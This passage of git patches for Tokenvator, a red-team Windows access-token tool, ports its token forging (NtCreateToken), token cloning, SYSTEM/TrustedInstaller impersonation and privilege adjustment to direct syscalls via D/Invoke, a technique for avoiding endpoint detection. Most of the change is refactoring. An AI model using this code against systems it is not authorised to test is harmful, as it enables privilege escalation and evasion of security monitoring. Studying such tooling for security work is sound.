+            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeNameW = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeNameW, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
 
             //IntPtr hPrivilegeCheck = Generic.GetExportAddress(hadvapi32, "PrivilegeCheck");
             //MonkeyWorks.advapi32.PrivilegeCheck fPrivilegeCheck = (MonkeyWorks.advapi32.PrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hPrivilegeCheck, typeof(MonkeyWorks.advapi32.PrivilegeCheck));
@@ -413,7 +419,6 @@ public void GetTokenPrivileges()
             IntPtr hNtPrivilegeCheck = Generic.GetSyscallStub("NtPrivilegeCheck");
             MonkeyWorks.ntdll.NtPrivilegeCheck fSyscallNtPrivilegeCheck = (MonkeyWorks.ntdll.NtPrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hNtPrivilegeCheck, typeof(MonkeyWorks.ntdll.NtPrivilegeCheck));
 
-
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
             {
                 StringBuilder lpName = new StringBuilder();
@@ -430,7 +435,7 @@ public void GetTokenPrivileges()
 
                 try
                 {
-                    fLookupPrivilegeName(null, lpLuid, null, ref cchName);
+                    fLookupPrivilegeNameW(null, lpLuid, null, ref cchName);
                 }
                 catch (Exception ex)
                 {
@@ -449,7 +454,7 @@ public void GetTokenPrivileges()
                 bool retVal = false;
                 try
                 {
-                    retVal = fLookupPrivilegeName(null, lpLuid, lpName, ref cchName);
+                    retVal = fLookupPrivilegeNameW(null, lpLuid, lpName, ref cchName);
                 }
                 catch (Exception ex)
                 {
@@ -497,6 +502,11 @@ public void GetTokenPrivileges()
                     continue;
                 }
                 Console.WriteLine("{0,-45}{1,-30}", lpName.ToString(), Convert.ToBoolean(pfResult));
+
+                if (!Privileges.Contains(lpName.ToString()))
+                {
+                    Privileges.Add(lpName.ToString().Trim());
+                }
             }
             Console.WriteLine();
         }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 6722c01..e827289 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -24,19 +24,6 @@ partial class TokenManipulation : AccessTokens
     {
         private Dictionary<uint, string> processes;
 
-        public static List<string> validPrivileges = new List<string> { "SeAssignPrimaryTokenPrivilege",
-            "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege",
-            "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege",
-            "SeCreateTokenPrivilege", "SeDebugPrivilege", "SeEnableDelegationPrivilege",
-            "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege", "SeIncreaseQuotaPrivilege",
-            "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege", "SeLockMemoryPrivilege",
-            "SeMachineAccountPrivilege", "SeManageVolumePrivilege", "SeProfileSingleProcessPrivilege",
-            "SeRelabelPrivilege", "SeRemoteShutdownPrivilege", "SeRestorePrivilege", "SeSecurityPrivilege",
-            "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege",
-            "SeSystemProfilePrivilege", "SeSystemtimePrivilege", "SeTakeOwnershipPrivilege",
-            "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",
-            "SeUndockPrivilege", "SeUnsolicitedInputPrivilege" };
-
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default Constructor
@@ -68,186 +55,13 @@ public override void Dispose()
             Dispose();
         }
 
-        /// <summary>
-        /// Should be able to replace with a single syscall
-        /// </summary>
-        public void DisableAndRemoveAllTokenPrivileges()
-        {
-            IntPtr hNtQueryInformationToken = Generic.GetSyscallStub("NtQueryInformationToken");
-            MonkeyWorks.ntdll.NtQueryInformationToken fSyscallNtQueryInformationToken = (MonkeyWorks.ntdll.NtQueryInformationToken)Marshal.GetDelegateForFunctionPointer(hNtQueryInformationToken, typeof(MonkeyWorks.ntdll.NtQueryInformationToken));
-
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hLookupPrivilegeNameW = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
-            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeNameW = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeNameW, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
-
-            IntPtr hNtAdjustPrivilegesToken = Generic.GetSyscallStub("NtAdjustPrivilegesToken");
-            MonkeyWorks.ntdll.NtAdjustPrivilegesToken fSyscallNtAdjustPrivilegesToken = (MonkeyWorks.ntdll.NtAdjustPrivilegesToken)Marshal.GetDelegateForFunctionPointer(hNtAdjustPrivilegesToken, typeof(MonkeyWorks.ntdll.NtAdjustPrivilegesToken));
-
-            IntPtr hNtPrivilegeCheck = Generic.GetSyscallStub("NtPrivilegeCheck");
-            MonkeyWorks.ntdll.NtPrivilegeCheck fSyscallNtPrivilegeCheck = (MonkeyWorks.ntdll.NtPrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hNtPrivilegeCheck, typeof(MonkeyWorks.ntdll.NtPrivilegeCheck));
-
-            Winnt._TOKEN_PRIVILEGES_ARRAY newTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
-            Winnt._TOKEN_PRIVILEGES_ARRAY previousTokenPrivileges = new Winnt._TOKEN_PRIVILEGES_ARRAY();
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Query the tokens for the privileges that are to be removed
-            // advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
-            // advapi32.GetTokenInformation(hExistingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, TokenInfLength, out TokenInfLength)
-            ////////////////////////////////////////////////////////////////////////////////
-            
-            #region QueryTokenInformation
-            Console.WriteLine("[*] Enumerating Token Privileges");
-            ulong tokenInfLength = 0;
-            
-            try
-            {
-                fSyscallNtQueryInformationToken(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, ref tokenInfLength);
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return;
-            }
-
-            if (tokenInfLength < 0 || tokenInfLength > ulong.MaxValue)
-            {
-                Misc.GetWin32Error("GetTokenInformation - 1 " + tokenInfLength);
-                return;
-            }
-            Console.WriteLine("[*] GetTokenInformation - Pass 1");
-            IntPtr lpTokenInformation = Marshal.AllocHGlobal((int)tokenInfLength);
-
-            uint ntRetVal = 0;
-            try
-            {
-                ntRetVal = fSyscallNtQueryInformationToken(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, lpTokenInformation, 0, ref tokenInfLength);
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return;
-            }
-
-            if (0 != ntRetVal)
-            {
-                Misc.GetNtError("NtQueryInformationToken", ntRetVal);
-                return;
-            }
-            Console.WriteLine("[*] GetTokenInformation - Pass 2");
-
-            Winnt._TOKEN_PRIVILEGES_ARRAY tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(lpTokenInformation, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
-            Marshal.FreeHGlobal(lpTokenInformation);
-
-            Console.WriteLine("[+] Enumerated {0} Privileges", tokenPrivileges.PrivilegeCount);
-            Console.WriteLine();
-            Console.WriteLine("{0,-45}{1,-30}", "Privilege Name", "Enabled");
-            Console.WriteLine("{0,-45}{1,-30}", "--------------", "-------");
-            #endregion
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Iterate through the privileges on the token
-            ////////////////////////////////////////////////////////////////////////////////
-            for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
-            {
-                StringBuilder lpName = new StringBuilder();
-                uint cchName = 0;
-                IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(tokenPrivileges.Privileges[i]));
-                Marshal.StructureToPtr(tokenPrivileges.Privileges[i].Luid, lpLuid, true);
-
-                ////////////////////////////////////////////////////////////////////////////////
-                // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
-                // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName)
-                ////////////////////////////////////////////////////////////////////////////////
-
-                try
-                {
-                    fLookupPrivilegeNameW(null, lpLuid, null, ref cchName);
-                }
-                catch (Exception ex)
-                {
-                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
-                    return;
-                }
-
-                if (cchName <= 0 || cchName > int.MaxValue)
-                {
-                    Misc.GetWin32Error("LookupPrivilegeName Pass 1");
-                    Marshal.FreeHGlobal(lpLuid);
-                    continue;
-                }
-
-                lpName.EnsureCapacity((int)cchName + 1);
-                bool retVal = false;
-                try
-                {
-                    retVal = fLookupPrivilegeNameW(null, lpLuid, lpName, ref cchName);
-                }
-                catch (Exception ex)
-                {
-                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
-                    return;
-                }
-
-                if (!retVal)
-                {
-                    Misc.GetWin32Error("LookupPrivilegeName Pass 2");
-                    Marshal.FreeHGlobal(lpLuid);
-                    continue;
-                }
-
-                Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
-                {
-                    PrivilegeCount = 1,
-                    Control = Winnt.PRIVILEGE_SET_ALL_NECESSARY,
-                    Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
-                };
-
-                ////////////////////////////////////////////////////////////////////////////////
-                // This seem unessessary
-                // advapi32.PrivilegeCheck(hExistingToken, ref privilegeSet, out pfResult)
-                ////////////////////////////////////////////////////////////////////////////////
-                /*
-                try
-                {
-                    fSyscallNtPrivilegeCheck(hWorkingToken, ref privilegeSet, ref )
-                }
-                catch (Exception ex)
-                {
-                    Console.WriteLine("[-] LookupPrivilegeNameW Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
-                    return;
-                }
-                */
-                int pfResult = 0;
-                /*
-                if (!advapi32.PrivilegeCheck(hExistingToken, ref privilegeSet, out pfResult))
-                {
-                    Misc.GetWin32Error("PrivilegeCheck");
-                    Marshal.FreeHGlobal(lpLuid);
-                    continue;
-                }
-                */
-                if (Convert.ToBoolean(pfResult))
-                {
-                    SetTokenPrivilege(lpName.ToString(), Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
-                }
-                SetTokenPrivilege(lpName.ToString(), Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
-                Marshal.FreeHGlobal(lpLuid);
-            }
-            Console.WriteLine();
-        }
-
         #region Privilege Escalations
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Starts a process with a duplicated SYSTEM Token
         /// No conversions required
         /// </summary>
-        /// <returns></returns>
+        /// <returns>Returns true if process was successfully started</returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem(string newProcess)
         {
@@ -293,7 +107,7 @@ public bool GetSystem(string newProcess)
         /// Impersonates a SYSTEM Token
         /// No conversions required
         /// </summary>
-        /// <returns></returns>
+        /// <returns>Returns true if impersonated successfullly</returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetSystem()
         {
@@ -334,7 +148,7 @@ public bool GetSystem()
         /// the TrustedInstaller service and starting a process with it's token
         /// No conversions required
         /// </summary>
-        /// <returns></returns>
+        /// <returns>Returns true if process was successfully started</returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTrustedInstaller(string newProcess)
         {
@@ -379,7 +193,7 @@ public bool GetTrustedInstaller(string newProcess)
         /// the TrustedInstaller service and stealing it token
         /// No conversions required
         /// </summary>
-        /// <returns></returns>
+        /// <returns>Returns true if impersonated successfullly</returns>
         ////////////////////////////////////////////////////////////////////////////////
         public bool GetTrustedInstaller()
         {
@@ -487,6 +301,7 @@ public void LogonUser(string domain, string username, string password, Winbase.L
         /// <summary>
         /// Logs on a user to create a new token for that user with custom groups
         /// Useful for doing things like getting trustedinstaller
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="domain"></param>
         /// <param name="username"></param>
@@ -574,8 +389,15 @@ public void LogonUser(string domain, string username, string password, string gr
             }
         }
 
-        // Can be use to remove groups, adding groups would require a new token 
-        //https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Can be use to remove groups, adding groups would require a new token
+        /// Removing groups would require creating a restricted token
+        /// https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="group"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
         public void DisableTokenGroup(string group)
@@ -722,7 +544,7 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
             uint ntRetVal = 0;
             try
             {
-                fSyscallNtAdjustPrivilegesToken(hWorkingToken, false, ref newState, (uint)Marshal.SizeOf(newState), ref previousState, ref returnLength);
+                ntRetVal = fSyscallNtAdjustPrivilegesToken(hWorkingToken, false, ref newState, (uint)Marshal.SizeOf(newState), ref previousState, ref returnLength);
             }
             catch(Exception ex)
             {
@@ -747,6 +569,7 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
         /// <summary>
         /// Updates the token session ID to the specified session
         /// Does this even work?
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="sessionId"></param>
         /// <returns>Return true if completed without error</returns>
diff --git a/Tokenvator/Resources/CommandLineParsing.cs b/Tokenvator/Resources/CommandLineParsing.cs
index 1998123..b422c98 100644
--- a/Tokenvator/Resources/CommandLineParsing.cs
+++ b/Tokenvator/Resources/CommandLineParsing.cs
@@ -22,7 +22,7 @@ public sealed class CommandLineParsing
         public bool Impersonation { get; private set; }
         public bool Legacy { get; private set; }
 
-        public static List<string> privileges = new List<string> { "SeAssignPrimaryTokenPrivilege",
+        public static List<string> Privileges = new List<string> { "SeAssignPrimaryTokenPrivilege",
             "SeAuditPrivilege", "SeBackupPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege",
             "SeCreatePagefilePrivilege", "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege",
             "SeCreateTokenPrivilege", "SeDebugPrivilege", "SeEnableDelegationPrivilege",
@@ -33,7 +33,8 @@ public sealed class CommandLineParsing
             "SeShutdownPrivilege", "SeSyncAgentPrivilege", "SeSystemEnvironmentPrivilege",
             "SeSystemProfilePrivilege", "SeSystemtimePrivilege", "SeTakeOwnershipPrivilege",
             "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",
-            "SeUndockPrivilege", "SeUnsolicitedInputPrivilege" };
+            "SeUndockPrivilege", "SeUnsolicitedInputPrivilege", 
+            "SeDelegateSessionUserImpersonatePrivilege" };
 
         public CommandLineParsing()
         {
@@ -283,10 +284,10 @@ private static bool _ParseProcessID(string input, out int output)
         private static bool _ParsePrivileges(string input, out string output)
         {
             //privileges.Any(s => s.Equals(input, StringComparison.OrdinalIgnoreCase))
-            int index = privileges.FindIndex(x => x.Equals(input.Trim(), StringComparison.OrdinalIgnoreCase));
+            int index = Privileges.FindIndex(x => x.Equals(input.Trim(), StringComparison.OrdinalIgnoreCase));
             if (-1 != index)
             {
-                output = privileges[index];
+                output = Privileges[index];
                 return true;
             }
             else
diff --git a/Tokenvator/Resources/TabComplete.cs b/Tokenvator/Resources/TabComplete.cs
index bd6cf0d..8004ff9 100644
--- a/Tokenvator/Resources/TabComplete.cs
+++ b/Tokenvator/Resources/TabComplete.cs
@@ -189,7 +189,7 @@ private void TabInput(StringBuilder stringBuilder, bool doubleTab)
                 switch (flag)
                 {
                     case "privilege":
-                        candidate = CommandLineParsing.privileges.FirstOrDefault(i => i != item && i.StartsWith(item, true, System.Globalization.CultureInfo.InvariantCulture));
+                        candidate = CommandLineParsing.Privileges.FirstOrDefault(i => i != item && i.StartsWith(item, true, System.Globalization.CultureInfo.InvariantCulture));
                         string[] j = input.Split(new string[] { ":" }, StringSplitOptions.None);
                         string k = string.Join(":", j.Take(j.Length - 1));
                         ResetLine();

From f64e07eeb78c7596c1ac268604ebbac9192939ab Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Tue, 31 Aug 2021 19:56:50 -0500
Subject: [PATCH 12/36] Partially converted CreateTokens + TokenManipulation
 BugFix

---
 .../Plugins/AccessTokens/CreateTokens.cs      | 978 +++++++++++++-----
 .../Plugins/AccessTokens/TokenManipulation.cs |  12 +-
 Tokenvator/Resources/Misc.cs                  |  16 +
 3 files changed, 718 insertions(+), 288 deletions(-)

diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index 9be11b1..9df0f02 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -1,23 +1,29 @@
 using System;
 using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
+using System.Security.Principal;
 using System.Text;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 using Tokenvator.Plugins.Enumeration;
 
 using MonkeyWorks.Unmanaged.Headers;
+using System.Runtime.ExceptionServices;
+using System.Security;
 using MonkeyWorks.Unmanaged.Libraries;
 
-using System.Security.Principal;
-
 namespace Tokenvator.Plugins.AccessTokens
 {
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
     //https://stackoverflow.com/questions/21716527/in-windows-how-do-you-programatically-launch-a-process-in-administrator-mode-un/21718198#21718198
 
     class CreateTokens : AccessTokens
     {
+        private bool ctDisposed = false;
+
         private uint localEntriesRead = 0;
         private uint localTotalEntriesRead = 0;
 
@@ -26,12 +32,58 @@ class CreateTokens : AccessTokens
 
         private int extraGroups = 0;
 
+        private IntPtr hSecurityContextTrackingMode;
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default Constructor
+        /// </summary>
+        /// <param name="token"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         public CreateTokens(IntPtr token) : base(token)
         {
             SetWorkingTokenToSelf();
         }
 
-        //SeCreateTokenPrivilege
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default destructor
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        ~CreateTokens()
+        {
+            if (!ctDisposed)
+            {
+                Dispose();
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// IDisposable to free the allocated pointers
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        public override void Dispose()
+        {
+            ctDisposed = true;
+
+            if (IntPtr.Zero != hSecurityContextTrackingMode)
+            {
+                Marshal.FreeHGlobal(hSecurityContextTrackingMode);
+            }
+
+            base.Dispose();
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates a duplicate of the currently calling token
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="command"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void CreateToken(string command)
         {
             if (!_CheckPrivileges())
@@ -39,20 +91,17 @@ public void CreateToken(string command)
                 return;
             }
 
-            //uint LG_INCLUDE_INDIRECT = 0x0001;
-            //uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
-
             Console.WriteLine();
             Console.WriteLine("_SECURITY_QUALITY_OF_SERVICE");
             Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
             {
                 Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
-                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
+                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                 ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
                 EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
             };
 
-            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
+            hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
             Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
 
             Console.WriteLine("_OBJECT_ATTRIBUTES");
@@ -66,39 +115,51 @@ public void CreateToken(string command)
                 SecurityQualityOfService = hSecurityContextTrackingMode
             };
 
-            TokenInformation ti = new TokenInformation(hWorkingToken);
-            ti.SetWorkingTokenToSelf();
+            uint ntRetVal = 0;
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.SetWorkingTokenToSelf();
 
-            ti.GetTokenSource();
-            ti.GetTokenUser();
-            ti.GetTokenGroups();
-            ti.GetTokenPrivileges();
-            ti.GetTokenOwner();
-            ti.GetTokenPrimaryGroup();
-            ti.GetTokenDefaultDacl();
+                ti.GetTokenSource();
+                ti.GetTokenUser();
+                ti.GetTokenGroups();
+                ti.GetTokenPrivileges();
+                ti.GetTokenOwner();
+                ti.GetTokenPrimaryGroup();
+                ti.GetTokenDefaultDacl();
 
-            Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
-            long expirationTime = long.MaxValue / 2;
+                Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
+                long expirationTime = long.MaxValue / 2;
 
-            phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
+                phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
 
-            //out/ref hToken - required
-            //Ref Expirationtime - required
-            uint ntRetVal = ntdll.NtCreateToken(
-                out phNewToken,
-                Winnt.TOKEN_ALL_ACCESS,
-                ref objectAttributes,
-                Winnt._TOKEN_TYPE.TokenPrimary,
-                ref systemLuid,
-                ref expirationTime,
-                ref ti.tokenUser,
-                ref ti.tokenGroups,
-                ref ti.tokenPrivileges,
-                ref ti.tokenOwner,
-                ref ti.tokenPrimaryGroup,
-                ref ti.tokenDefaultDacl,
-                ref ti.tokenSource
-            );
+                IntPtr hNtCreateToken = Generic.GetSyscallStub("NtCreateToken");
+                MonkeyWorks.ntdll.NtCreateToken fSyscallNtCreateToken = (MonkeyWorks.ntdll.NtCreateToken)Marshal.GetDelegateForFunctionPointer(hNtCreateToken, typeof(MonkeyWorks.ntdll.NtCreateToken));
+
+                try
+                {
+                    ntRetVal = fSyscallNtCreateToken(
+                        out phNewToken,
+                        Winnt.TOKEN_ALL_ACCESS,
+                        ref objectAttributes,
+                        Winnt._TOKEN_TYPE.TokenPrimary,
+                        ref systemLuid,
+                        ref expirationTime,
+                        ref ti.tokenUser,
+                        ref ti.tokenGroups,
+                        ref ti.tokenPrivileges,
+                        ref ti.tokenOwner,
+                        ref ti.tokenPrimaryGroup,
+                        ref ti.tokenDefaultDacl,
+                        ref ti.tokenSource
+                    );
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine("[-] NtCreateToken Generated an Exception");
+                    Console.WriteLine(ex.Message);
+                }
+            }
 
             if (0 != ntRetVal)
             {
@@ -115,7 +176,15 @@ ref ti.tokenSource
             StartProcessAsUser(command);
         }
 
-        //SeCreateTokenPrivilege
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Creates a token from scratch with additinal groups allowed
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="command"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void CreateToken(string userName, string[] groups, string command)
         {
             Console.WriteLine("[*] Creating Token for {0}", userName);
@@ -124,8 +193,6 @@ public void CreateToken(string userName, string[] groups, string command)
             {
                 return;
             }
-            
-            //uint MAX_PREFERRED_LENGTH = 0xFFFFFFFF;
 
             #region _OBJECT_ATTRIBUTES
             Console.WriteLine();
@@ -138,7 +205,7 @@ public void CreateToken(string userName, string[] groups, string command)
                 EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
             };
 
-            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
+            hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
             Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
 
             Console.WriteLine("[*] _OBJECT_ATTRIBUTES");
@@ -184,23 +251,33 @@ public void CreateToken(string userName, string[] groups, string command)
 
             phNewToken = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(IntPtr)));
 
-            //out/ref hToken - required
-            //Ref Expirationtime - required
-            uint ntRetVal = ntdll.NtCreateToken(
-                out phNewToken,
-                Winnt.TOKEN_ALL_ACCESS,
-                ref objectAttributes,
-                Winnt._TOKEN_TYPE.TokenPrimary,
-                ref systemLuid,
-                ref expirationTime,
-                ref tokenUser,
-                ref tokenGroups,
-                ref tokenPrivileges,
-                ref tokenOwner,
-                ref tokenPrimaryGroup,
-                ref tokenDefaultDacl,
-                ref tokenSource
-            );
+            IntPtr hNtCreateToken = Generic.GetSyscallStub("NtCreateToken");
+            MonkeyWorks.ntdll.NtCreateToken fSyscallNtCreateToken = (MonkeyWorks.ntdll.NtCreateToken)Marshal.GetDelegateForFunctionPointer(hNtCreateToken, typeof(MonkeyWorks.ntdll.NtCreateToken));
+
+            uint ntRetVal = 0;
+            try
+            {
+                ntRetVal = fSyscallNtCreateToken(
+                    out phNewToken,
+                    Winnt.TOKEN_ALL_ACCESS,
+                    ref objectAttributes,
+                    Winnt._TOKEN_TYPE.TokenPrimary,
+                    ref systemLuid,
+                    ref expirationTime,
+                    ref tokenUser,
+                    ref tokenGroups,
+                    ref tokenPrivileges,
+                    ref tokenOwner,
+                    ref tokenPrimaryGroup,
+                    ref tokenDefaultDacl,
+                    ref tokenSource
+                );
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtCreateToken Generated an Exception");
+                Console.WriteLine(ex.Message);
+            }
 
             if (0 != ntRetVal)
             {
@@ -208,12 +285,13 @@ ref tokenSource
                 return;
             }
 
-
             Console.WriteLine();
 
-            DesktopACL desktop = new DesktopACL();
-            desktop.OpenDesktop();
-            desktop.OpenWindow();
+            using (DesktopACL desktop = new DesktopACL())
+            {
+                desktop.OpenDesktop();
+                desktop.OpenWindow();
+            }
 
             Console.WriteLine();
 
@@ -221,10 +299,20 @@ ref tokenSource
             {
                 command = "cmd.exe";
             }
+
             SetWorkingTokenToNewToken();
-            StartProcessAsUser(command);         
+            StartProcessAsUser(command);
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Clones a remote access token to create a process off of it
+        /// Converted to D/Invoke Syscalls
+        /// </summary>
+        /// <param name="command"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void CloneToken(int processId, string command)
         {
             if (!_CheckPrivileges())
@@ -237,12 +325,12 @@ public void CloneToken(int processId, string command)
             Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
             {
                 Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
-                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
+                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
                 ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
                 EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
             };
 
-            IntPtr hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
+            hSecurityContextTrackingMode = Marshal.AllocHGlobal(Marshal.SizeOf(securityContextTrackingMode));
             Marshal.StructureToPtr(securityContextTrackingMode, hSecurityContextTrackingMode, false);
 
             Console.WriteLine("_OBJECT_ATTRIBUTES");
@@ -256,41 +344,44 @@ public void CloneToken(int processId, string command)
                 SecurityQualityOfService = hSecurityContextTrackingMode
             };
 
-            TokenInformation ti = new TokenInformation(hWorkingToken);
-            //ti.SetWorkingTokenToRemote();
-            ti.OpenProcessToken(processId);
-            ti.SetWorkingTokenToRemote();
-
-            ti.GetTokenSource();
-            ti.GetTokenUser();
-            ti.GetTokenGroups();
-            ti.GetTokenPrivileges();
-            ti.GetTokenOwner();
-            ti.GetTokenPrimaryGroup();
-            ti.GetTokenDefaultDacl();
-
-            Winnt._LUID systemLuid = Winnt.SYSTEM_LUID;
